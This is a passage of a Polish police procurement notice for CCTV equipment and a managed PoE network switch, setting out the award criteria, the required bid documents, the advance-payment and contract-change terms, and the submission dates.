adresem<br/>https://platformazakupowa.pl/pn/kwp_radom</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres udzielonej gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20,00</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin dostawy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest zakup wraz z dostarczeniem sprzętu do CCTV dla potrzeb jednostek Policji garnizonu mazowieckiego zadanie nr 2 – umowa ramowa- zgodnego z Opisem Przedmiotu Zamówienia (OPZ) – stanowiącym załącznik nr 5.2 do SWZ.<br/>2)	Zadanie nr 2 – Switch zarządzalny 24 portowy PoE<br/><br/>Oferowane przez Wykonawcę przedmioty zamówienia są fabrycznie nowe oraz wolne od wad fizycznych i prawnych. Przez wadę fizyczną należy rozumieć również jakąkolwiek niezgodność z Opisem przedmiotu zamówienia.<br/><br/>Oferowane przez Wykonawcę przedmioty zamówienia muszą być fabrycznie nowe, wolne od wad fizycznych i prawnych oraz spełniać minimalne wymagania określone w poszczególnych charakterystykach Opisu przedmiotu zamówienia (OPZ) i zostać objętym co najmniej minimalnym okresem gwarancji. Zasady serwisu i gwarancji zostały szczegółowo opisane w poszczególnych częściach OPZ/tabeli porównawczej oferowanego sprzętu, który jednocześnie będzie stanowił integralną część do Umowy. <br/>Ilekroć przedmiot zamówienia został opisany poprzez odniesienie do norm, europejskich ocen technicznych, aprobat, specyfikacji technicznych i systemów referencji technicznych, o których mowa w art. 101 ust. 1 pkt 2 i ust. 3 ustawy Pzp. Zamawiający wskazuje, że dopuszczalne są rozwiązania równoważne opisywanym, a odniesieniu takiemu towarzyszą wyrazy „lub równoważne”. W przypadku natomiast odniesienia i jednoczesnego braku wskazanych wyrazów „lub równoważne” Zamawiający wymaga aby każdorazowo traktować takie odniesienia w taki sposób jakby towarzyszyły im wyrazy „lub równoważne”. <br/>Zamawiający określił kryteria równoważności, tj. wybrane cechy przedmiotu zamówienia. <br/>Zamawiający dopuszczając równoważność sprecyzował zakres minimalnych parametrów, w oparciu o które dokona oceny spełnienia wymagań określonych w SWZ. Równoważność należy przyjmować z uwzględnieniem parametrów istotnych nie gorszych, niż wynikające z norm, europejskich ocen technicznych, aprobat, specyfikacji technicznych i systemów referencji technicznych przy pomocy, których dokonano opisu przedmiotu zamówienia, w szczególności uwzględniając dane wskazane w Opisie przedmiotu zamówienia (OPZ)/ tabeli porównawczej oferowanego sprzętu Przy ocenie równoważności zaoferowanego rozwiązania należy kierować się przeznaczeniem oraz funkcją wynikającą z dokumentacji, zapotrzebowania i przeznaczenia użytkowego.<br/><br/>Okres gwarancji: Wykonawca udziela gwarancji na oferowane przedmioty zamówienia określone w OPZ na okres zgodny z okresem wskazanym w Formularzu ofertowym licząc od daty podpisania bez zastrzeżeń protokołu odbioru przedmiotu umowy.<br/>Minimalny wymagany okres udzielonej gwarancji wynosi 24 miesiące, maksymalnie punktowany 60 miesięcy. <br/><br/>Szczegółowy opis przedmiotu zamówienia określony został w:<br/>	Projektowanych postanowieniach umowy ramowej – stanowiący Załącznik nr 1 do SWZ;<br/>	Formularzu ofertowym do umowy ramowej dla zadania nr 2 – stanowiącym Załącznik nr 2.2 do SWZ;<br/>	Formularzu ofertowym do umowy wykonawczej dla zadania nr 2 – stanowiącym Załącznik nr 4.2 do SWZ;<br/>	Opisie przedmiotu zamówienia dla zadania nr 2 – stanowiącym Załącznik nr 5.2 do SWZ<br/>	Projektowanych postanowieniach umowy wykonawczej– stanowiący Załącznik nr 6 do SWZ </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 52597,50 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">32420000-3 - Urządzenia sieciowe</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">18 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy dokonywaniu oceny Zamawiający posłuży się następującymi wzorami:<br/><br/>	dla kryterium - Cena brutto oferty „C”: <br/><br/>C=C_N/C_O x60 pkt.<br/><br/>gdzie:<br/>C - wartość punktowa przyznana ocenianej ofercie w kryterium „Cena”, <br/>CN - najniższa cena ofertowa (brutto) spośród wszystkich ofert podlegających ocenie, <br/>Co - cena oferty ocenianej (brutto). <br/>Uzyskana liczba punktów w ramach kryterium „Cena” zaokrąglana będzie do drugiego miejsca po przecinku.<br/>dla kryterium - Okres udzielonej gwarancji „G” (wyrażony w pełnych miesiącach - liczbie całkowitej), powyżej minimalnych warunków (wymagane minimum 24 miesiące). <br/>W kryterium - „Okres udzielonej gwarancji” oceniany będzie zadeklarowany (tzn. wpisany w treści Formularza ofertowego) przez Wykonawcę czas obowiązywania gwarancji na dostarczony sprzęt.<br/>Minimalny wymagany „Okres udzielonej gwarancji” wynosi 24 miesiące, maksymalnie punktowany - 60 miesięcy, licząc od daty podpisania bez zastrzeżeń protokołu odbioru przedmiotu zamówienia. W przypadku gdy Wykonawca zadeklaruje „Okres udzielonej gwarancji” dłuższy niż 60 miesięcy, ocenie będzie podlegał okres 60 miesięcy.<br/>Natomiast w przypadku gdy Wykonawca zadeklaruje „Okres udzielonej gwarancji” krótszy niż 24 miesiące oferta Wykonawcy będzie podlegała odrzuceniu.<br/>Punktacja Wykonawcom przypisana zostanie odpowiednio według poniższych wytycznych:<br/>	oferta zawierająca deklarowany „Okres udzielonej gwarancji” - w przedziale <br/>≥ 24 ≤ 35 miesięcy - 0 punktów;<br/>	oferta zawierająca deklarowany „Okres udzielonej gwarancji” - w przedziale ≥ 36 ≤ 47 miesięcy - 10 punktów;<br/>	oferta zawierająca deklarowany „Okres udzielonej gwarancji” - w przedziale ≥ 48 ≤ 59 miesięcy - 15 punktów;<br/>	oferta zawierająca deklarowany „Okres udzielonej gwarancji” - w przedziale ≥ 60 miesięcy - 20 punktów.<br/>Zakres udzielonej gwarancji przez cały oferowany okres musi być tożsamy z zakresem wymaganej 24 miesięcznej gwarancji. W przypadku niewpisania okresu gwarancji należy przyjąć, że Wykonawca zaoferował minimalny „okres gwarancji”, tj. 24 miesiące.<br/>W zakresie sprzętu wymienionego w pozycji 2 oraz 3 OPZ/ tabeli porównawczej oferowanego sprzętu dla zadania nr 1 wymaga się, aby w przypadku zabrania sprzętu przez Wykonawcę w celu naprawy, dysk twardy oraz ewentualne elementy zawierające nośniki danych pozostały u Zamawiającego. Dysk w przypadku awarii pozostaje u Zamawiającego z zastrzeżeniem, że w okresie trwania gwarancji Wykonawca ma możliwość zdiagnozowania dysku w KWP bez możliwości jego testowania poza siedzibą Zamawiającego.<br/><br/>	dla kryterium – Termin dostawy „D” (wyrażony w pełnych dniach kalendarzowych – liczbie całkowitej)<br/><br/>Kryterium - „Termin dostawy” będzie oceniane na podstawie zadeklarowanego przez Wykonawcę w treści Formularza ofertowego „Terminu dostawy”.<br/>Wykonawca zobowiązany jest wypełnić Formularz ofertowy - odpowiednio wpisać do rubryki Formularza ofertowego &lt;Termin dostawy&gt; liczbę dni kalendarzowych, jednak nie dłużej niż 30 dni, w jakim Wykonawca zobowiązuje się dostarczyć przedmiot umowy. <br/><br/>Przy przyznawaniu i przeliczaniu punktów będą brane pod uwagę tylko te oferty, w których zostanie zaproponowany termin realizacji nie dłuższy niż 30 dni kalendarzowych.<br/>Proponowane przyznawanie i przeliczanie punktów w ramach tego kryterium wyboru ofert:<br/>	oferta zawierająca w przedziale 1 ÷ 14 dni kalendarzowych deklarowanego „Terminu dostawy” – 20 punktów;<br/>	oferta zawierająca w przedziale 15 ÷ 20 dni kalendarzowych deklarowanego „Terminu dostawy” – 15 punktów;<br/>	oferta zawierająca w przedziale 21 ÷ 25 dni kalendarzowych deklarowanego „Terminu dostawy” – 10 punktów;<br/>	oferta zawierająca w przedziale 26 ÷ 29 dni kalendarzowych deklarowanego „Terminu dostawy” – 5 punktów;<br/>	oferta zawierająca 30 dni kalendarzowych deklarowanego „Terminu dostawy” – 0 punktów.<br/>Z uwagi na ograniczoną ilość znaków , pełna informacja w powyższym zakresie zawarta jest w SWZ zamieszczonej pod adresem<br/>https://platformazakupowa.pl/pn/kwp_radom</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres udzielonej gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20,00</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin dostawy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> 1.	Przedmiotowe środki dowodowe potwierdzające, że oferowane dostawy spełniają wymagania określone przez Zamawiającego w dokumentach zamówienia, należy ZŁOŻYĆ WRAZ Z OFERTĄ DO UMOWY RAMOWEJ:<br/>1)	Oświadczenie Wykonawcy, że oferowane produkty są zgodne z Opisem przedmiotu zamówienia – (wzór stanowi załącznik nr 7 do SWZ).<br/>2)	Tabela porównawcza oferowanego przez Wykonawcę sprzętu/ zaakceptowany Opis przedmiotu zamówienia (OPZ) – dla zadań/a, na które składana jest oferta (wzór stanowi Załącznik nr 5.1-5.2 do SWZ) potwierdzająca, że oferowane dostawy spełniają wymagania określone przez Zmawiającego. Wykonawca winien dokonać prawidłowego wyboru między „spełnia/ nie spełnia wymagania Zamawiającego” zaznaczając we wskazanym miejscu przy wymienionym sprzęcie.<br/><br/>2.	Przedmiotowe środki dowodowe potwierdzające, że oferowane dostawy spełniają wymagania określone przez Zamawiającego w dokumentach zamówienia, należy ZŁOŻYĆ WRAZ Z OFERTĄ DO UMOWY WYKONAWCZEJ (Wykonawca który zawarł umowę ramową wraz z ofertą wykonawczą złoży poniższe przedmiotowe środki dowodowe potwierdzające, że oferowane produkty spełniają wymagania określone przez Zamawiającego w dokumentach zamówienia)<br/>1)	Karty katalogowe produktu dla sprzętu do CCTV opisanego w OPZ (pkt 1 ÷ 5 - dla zadania 1 oraz pkt. 1 dla zadania nr 2) – Zamawiający wyraża zgodę na złożenie dokumentów w języku angielskim bez tłumaczenia na język polski <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> 1.	Przedmiotowe środki dowodowe podlegające uzupełnieniu DO UMOWY RAMOWEJ:<br/>1)	Oświadczenie Wykonawcy, że oferowane produkty są zgodne z Opisem przedmiotu zamówienia – (wzór stanowi załącznik nr 7 do SWZ).<br/>2)	Tabela porównawcza oferowanego przez Wykonawcę sprzętu/ zaakceptowany Opis przedmiotu zamówienia (OPZ) – dla zadań/a, na które składana jest oferta (wzór stanowi Załącznik nr 5.1-5.2 do SWZ) potwierdzająca, że oferowane dostawy spełniają wymagania określone przez Zmawiającego. Wykonawca winien dokonać prawidłowego wyboru między „spełnia/ nie spełnia wymagania Zamawiającego” zaznaczając we wskazanym miejscu przy wymienionym sprzęcie.<br/><br/>2.	Przedmiotowe środki dowodowe podlegające uzupełnieniu DO UMOWY WYKONAWCZEJ (Wykonawca który zawarł umowę ramową wraz z ofertą wykonawczą złoży poniższe przedmiotowe środki dowodowe potwierdzające, że oferowane produkty spełniają wymagania określone przez Zamawiającego w dokumentach zamówienia)<br/>1)	Karty katalogowe produktu dla sprzętu do CCTV opisanego w OPZ (pkt 1 ÷ 5 - dla zadania 1 oraz pkt. 1 dla zadania nr 2) – Zamawiający wyraża zgodę na złożenie dokumentów w języku angielskim bez tłumaczenia na język polski <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Do oferty ramowej należy dołączyć:<br/>1)	Formularz ofertowy do umowy ramowej wypełniony we wszystkich pozycjach dla zadań/zadania, na które składana jest oferta (wzór stanowi załącznik 2.1-2.2 do SWZ)<br/>2)	Pełnomocnictwo upoważniające do złożenia oferty, o ile ofertę składa pełnomocnik<br/>3)	Pełnomocnictwo dla pełnomocnika do reprezentowania w postępowaniu wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcjum, spółka cywilna) – dotyczy ofert składanych wspólnie przez wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>4)	Oświadczenie wykonawcy o niepodleganiu wykluczeniu z postępowania – wzór oświadczenia o niepodleganiu wykluczeniu stanowi załącznik nr 3 do SWZ. W przypadku wspólnego ubiegania się o zamówienie przez wykonawców (konsorcjum, spółka cywilna), oświadczenie o niepodleganiu wykluczeniu składa każdy z wykonawców. <br/>5)	Przedmiotowe środki dowodowe o których mowa w pkt. V.2 SWZ:<br/>a)	Oświadczenie Wykonawcy, że oferowane produkty są zgodne z Opisem przedmiotu zamówienia - (wzór stanowi załącznik nr 7 do SWZ).<br/>b)	Tabela porównawcza oferowanego przez Wykonawcę sprzętu/ zaakceptowany Opis przedmiotu zamówienia (OPZ) - dla zadań/a, na które składana jest oferta (wzór stanowi Załącznik nr 5.1-5.2 do SWZ) potwierdzająca, że oferowane dostawy spełniają wymagania określone przez Zmawiającego. Wykonawca winien dokonać prawidłowego wyboru między „spełnia/ nie spełnia wymagania Zamawiającego” zaznaczając we wskazanym miejscu przy wymienionym sprzęcie.<br/><br/>Do oferty wykonawczej należy dołączyć:<br/>1)	Formularz ofertowy do umowy wykonawczej wypełniony we wszystkich pozycjach dla zadań/zadania, na które składana jest oferta (wzór stanowi załącznik 4.1-4.2 do SWZ)<br/>2)	Przedmiotowe środki dowodowe o których mowa w pkt. V.2 SWZ:<br/>a)	Karty katalogowe produktu dla sprzętu do CCTV opisanego w OPZ (pkt 1 ÷ 5 - dla zadania 1 oraz pkt. 1 dla zadania nr 2) – Zamawiający wyraża zgodę na złożenie dokumentów w języku angielskim bez tłumaczenia na język polski <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1) Do oferty ramowej należy dołączyć pełnomocnictwo dla pełnomocnika do reprezentowania w postępowaniu wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcjum, spółka cywilna) – dotyczy ofert składanych wspólnie przez wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>2) Do oferty ramowej należy dołączyć oświadczenie wykonawcy o niepodleganiu wykluczeniu z postępowania – wzór oświadczenia o niepodleganiu wykluczeniu stanowi załącznik nr 3 do SWZ. W przypadku wspólnego ubiegania się o zamówienie przez wykonawców (konsorcjum, spółka cywilna), oświadczenie o niepodleganiu wykluczeniu składa każdy z wykonawców. <br/>3) Przed podpisaniem umowy ramowej wykonawcy wspólnie ubiegający się o udzielenie zamówienia (konsorcjum, spółka cywilna) przedstawią zamawiającemu kopię umowy regulującej współpracę tych wykonawców <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.2.) Informacje na temat zaliczek: </h3> 1.	Zamawiający dopuszcza zgodnie z art. 442 ust. 1 ustawy Pzp, udzielenie zaliczki na poczet wykonania zamówienia, po uprzednim zaakceptowaniu przez Zamawiającego wniosku o udzielenie zaliczki złożonego przez Wykonawcę. Wniosek powinien zawierać:<br/>a) wartość wnioskowanej zaliczki,<br/>b) proponowany termin wypłaty i rozliczenia zaliczki,<br/>c) formę zabezpieczenia zaliczki,<br/>d) numer rachunku, na który zaliczka ma zostać wypłacona.<br/>Zaliczka będzie wypłacona Wykonawcy po zawarciu umowy i wniesieniu przez Wykonawcę zabezpieczenia zaliczki oraz dostarczeniu Zamawiającemu faktury zaliczkowej. Zaliczka musi zostać przeznaczona na realizację przedmiotu zamówienia. Wykonawca będzie zobowiązany przedstawić rozliczenie zaliczki zawierające dowody jej wydatkowania zgodnie z przeznaczeniem i potwierdzające, że zamówienie zostało zrealizowane w zakresie udzielonej zaliczki. Dowodami mogą być np. faktury, protokoły zdawczo – odbiorcze, dokumenty potwierdzające poniesione koszty związane z realizacją przedmiotu zamówienia, na które udzielona została zaliczka.<br/>2.	Wysokość zaliczki wyniesie do 95 % wartości umowy brutto, określonej w ust. 1 niniejszej umowy.<br/>3.	Przed udzieleniem zaliczki Wykonawca przedłoży Zamawiającemu dokument potwierdzający zabezpieczenie zaliczki w wysokości 100% kwoty zaliczki. Dokument potwierdzający zabezpieczenie zaliczki musi zawierać bezwarunkowo i nieodwołalne zobowiązanie gwaranta/poręczyciela do wypłaty na rzecz Zamawiającego kwoty zaliczki na każde żądanie Zamawiającego zawierające oświadczenie, że Wykonawca pomimo pisemnego wezwania nie zwrócił mu przekazanej zaliczki. W przypadku, gdy dokument nie będzie spełniał wymienionych wymagań Zamawiający nie udzieli zaliczki.<br/>4.	Zabezpieczenie, o którym mowa w ust. 3 może być wniesione w formach przewidzianych w art. 442 ust. 3 ustawy Pzp, przy czym Zamawiający dopuszcza wniesienie zaliczki wyłącznie w formach określonych w pkt 1) – 3) art. 442 ust. 3.<br/>5.	Zabezpieczenie zaliczki musi być złożone przy użyciu środków komunikacji elektronicznej <br/>lub wpłynąć na rachunek Zamawiającego.<br/>6.	Zabezpieczenie zaliczki, wnoszone w jednej z form określonych w ust. 4 należy złożyć w postaci dokumentu elektronicznego opatrzonego kwalifikowanym podpisem elektronicznym osób upoważnionych do jego wystawienia (przedstawicieli Gwaranta) na adres Wydziału Łączności i Informatyki KWP z siedzibą w Radomiu: informatyka.kwp@ra.policja.gov.pl. Zabezpieczenie zaliczki musi być ustanowione zgodnie z prawem polskim i podlegać prawu polskiemu.<br/>7.	Sposób wnoszenia zabezpieczenia zaliczki przy użyciu środków komunikacji elektronicznej musi być zgodny z przepisami: ustawy Prawo bankowe Dz. U. z 2020 r., poz. 2439 z późn. zm., ustawy o działalności ubezpieczeniowej i reasekuracyjnej Dz. U. z 2018 r., poz. 999, ustawy o SKOK-ach, ustawy z dnia 09.11.2000 r. o utworzeniu Polskiej Agencji Rozwoju przedsiębiorczości Dz. U. z 2022 r., poz. 299 z późn. zm., ustawy z dnia 23.04.1964 r. - Kodeks cywilny Dz. U. z 2024 r., poz. 1740/. Treść dokumentu zabezpieczenia zaliczki wymaga akceptacji przez Zamawiającego.<br/>8.	Dokument gwarancji/poręczenia wystawiony przez podmiot zagraniczny powinien posiadać tłumaczenie przysięgłe na język polski. W przypadku, gdy dokument potwierdzający wniesienie zabezpieczenia zaliczki wystawi podmiot zagraniczny dokument ten winien zawierać klauzule, <br/>iż wszystkie prawa i obowiązki wynikające z wystawionego dokumentu podlegają prawu polskiemu i ewentualnie spory będą rozstrzygane przez polski sąd miejscowo właściwy dla siedziby Zamawiającego.<br/>9.	W trakcie wykonywania umowy Wykonawca może zmienić formę zabezpieczenia zaliczki na jedną lub kilka form z wyżej wymienionych, pod warunkiem zachowania ciągłości zabezpieczenia zaliczki bez zmniejszenia jej wartości.<br/>10. ...<br/>Z uwagi na ograniczoną ilość znaków , pełna informacja w powyższym zakresie zawarta jest w SWZ zamieszczonej pod adresem<br/>https://platformazakupowa.pl/pn/kwp_radom <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Projektowane postanowienia umowy w sprawie zamówienia, które zostaną wprowadzone do treści tej umowy, określone zostały w:<br/>1)	załączniku nr 1 do SWZ – projektowanych postanowieniach umowy ramowej dla zadania nr 1-2;<br/>2)	załączniku nr 6 do SWZ – projektowanych postanowieniach umowy wykonawczej dla zadania nr 1-2.<br/><br/>Zamawiający dopuszcza zmiany umowy ramowej w następującym zakresie:<br/>1)	Waloryzacja<br/>2)	Zmiana wynagrodzenia <br/><br/>1)	Waloryzacja<br/>1.	Strony postanawiają, że dokonają w formie pisemnego aneksu zmiany wynagrodzenia w przypadku wystąpienia którejkolwiek ze zmian wskazanych w art. 436 pkt 4 ppkt b) ustawy z dnia 11 września 2019r. Prawo zamówień publicznych, jeżeli zmiany te będą miały wpływ na koszty wykonania zamówienia przez Wykonawcę tj. zmiany:<br/>a)	stawki podatku od towarów i usług oraz podatku akcyzowego,<br/>b)	wysokości minimalnego wynagrodzenia za pracę albo wysokości minimalnej stawki godzinowej, ustalonych na podstawie ustawy z dnia 10 października 2002 r. o minimalnym wynagrodzeniu za pracę,<br/>c)	zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawki składki na ubezpieczenie społeczne lub ubezpieczenie zdrowotne,<br/>d)	zasad gromadzenia i wysokości wpłat do pracowniczych planów kapitałowych, o których mowa <br/>w ustawie z dnia 4 października 2018 r. o pracowniczych planach kapitałowych (Dz. U. z 2023 r. poz. 46 z póź. zm.).<br/>2.	W przypadkach, o których mowa w ust. 1 Wykonawca może zwrócić się do Zamawiającego <br/>z pisemnym wnioskiem o przeprowadzenie negocjacji dotyczących zmiany wysokości wynagrodzenia należnego Wykonawcy.<br/>3.	Wykonawca może zwrócić się do Zamawiającego z wnioskiem, o którym mowa w ust. 2 po opublikowaniu (zgodnie z przepisami obowiązującego prawa) zmian przepisów prawa, będących podstawą wnioskowania o zmianę wynagrodzenia. <br/>4.	W przypadku złożenia przez Wykonawcę wniosku, o którym mowa w ust. 2 przed publikacją, <br/>o której mowa w ust. 3, Zamawiający nie jest zobowiązany do zmiany wysokości wynagrodzenia należnego Wykonawcy.<br/>5.	Wniosek, o którym mowa w ust. 2 musi zawierać:<br/>a)	Wskazanie zmiany przepisów prawa, będącej przyczyną wystąpienia przez Wykonawcę <br/>z wnioskiem,<br/>b)	Wskazanie wysokości proponowanej zmiany wynagrodzenia należnego Wykonawcy,<br/>c)	Szczegółowe opisanie i przedstawienie wpływu zmian przepisów prawa na koszty wykonania zamówienia.<br/>6.	Z wyjątkiem sytuacji, o której mowa w ust. 1 ppkt a) do wniosku, o którym mowa w ust. 2, Wykonawca zobowiązany jest załączyć dowody wskazujące wpływ zmian przepisów prawa na wysokość kosztów wykonania umowy oraz wysokość wzrostu kosztów wykonania umowy, w tym w szczególności:<br/>a)	Pisemne zestawienie wynagrodzeń (obrazujące stan przed i po dokonanej zmianie) pracowników Wykonawcy, wraz z określeniem zakresu (części etatu), w jakim wykonują oni prace bezpośrednio związane z realizacją przedmiotu umowy oraz części wynagrodzenia odpowiadającej temu zakresowi – w przypadku zmiany, o której mowa w ust. 1 ppkt b);<br/>i/lub<br/>b)	Pisemne zestawienie wynagrodzeń (obrazujące stan przed i po dokonanej zmianie) pracowników Wykonawcy, wraz z kwotami składek uiszczanych do Zakładu Ubezpieczeń Społecznych/Kasy Rolniczego Ubezpieczenia Społecznego w części finansowanej przez Wykonawcę, z określeniem zakresu (części etatu), w jakim wykonują oni prace bezpośrednio związane z realizacją przedmiotu umowy oraz części wynagrodzenia odpowiadającej temu zakresowi – w przypadku zmiany, o której mowa w ust. 1 ppkt c)<br/>i/lub ................<br/>Z uwagi na ograniczoną ilość znaków , pełna informacja w powyższym zakresie zawarta jest w SWZ zamieszczonej pod adresem<br/>https://platformazakupowa.pl/pn/kwp_radom <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-10-17 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/kwp_radom</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-10-17 10:05</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-11-15</span></h3> <h3 class="mb-0">8.19.) Umowa ramowa: </h3> Umowa ramowa zawarta zostanie z kilkoma wykonawcami <h3 class="mb-0">8.20.) Przewiduje się ograniczenie liczby uczestników umowy ramowej: <span class="normal">Tak</span></h3> <h3 class="mb-0">8.21.) Maksymalna liczba wykonawców, z którymi zamawiający zawrze umowę ramową: <span class="normal">5</span></h3> <h3 class="mb-0">8.22.) Zamawiający udziela zamówień na podstawie art. 314 ust. 1 pkt 1, 2 albo 3 ustawy: <span class="normal">Zamawiający udziela zamówień na podstawie art. 314 ust. 1 pkt 3 ustawy</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Dotyczy punktu 4.2.10.) ogłoszenia Okres realizacji zamówienia albo umowy ramowej: <br/>Termin obowiązywania umowy ramowej: 18 miesięcy od dnia zawarcia umowy ramowej lub do wcześniejszego wyczerpania limitu kwoty środków finansowych, jakie Zamawiający przeznaczy na jej realizację w ramach poszczególnych zadań, w zależności od tego, która okoliczność nastąpi wcześniej.<br/>Termin realizacji zamówień cząstkowych z umowy wykonawczej: max 30 dni kalendarzowych licząc od dnia następnego po dniu zawarcia umowy wykonawczej, z uwzględnieniem III kryterium oceny ofert wskazanego w rozdziale XX.1 SWZ – tj. terminu dostawy „D” zadeklarowanego przez Wykonawcę w treści oferty. <br/>1)	Zamawiający przewiduje składanie ofert częściowych: TAK<br/>2)	Liczba części zamówienia zgodnie z dokumentami zamówienia wynosi: 2<br/>a)	Zadanie nr 1 – Panel wizyjny, rejestratory wraz z dyskami, kamery<br/>b)	Zadanie nr 2 – Switch zarządzalny 24 portowy PoE<br/>3)	Ofertę można złożyć na jedną, na wszystkie części. 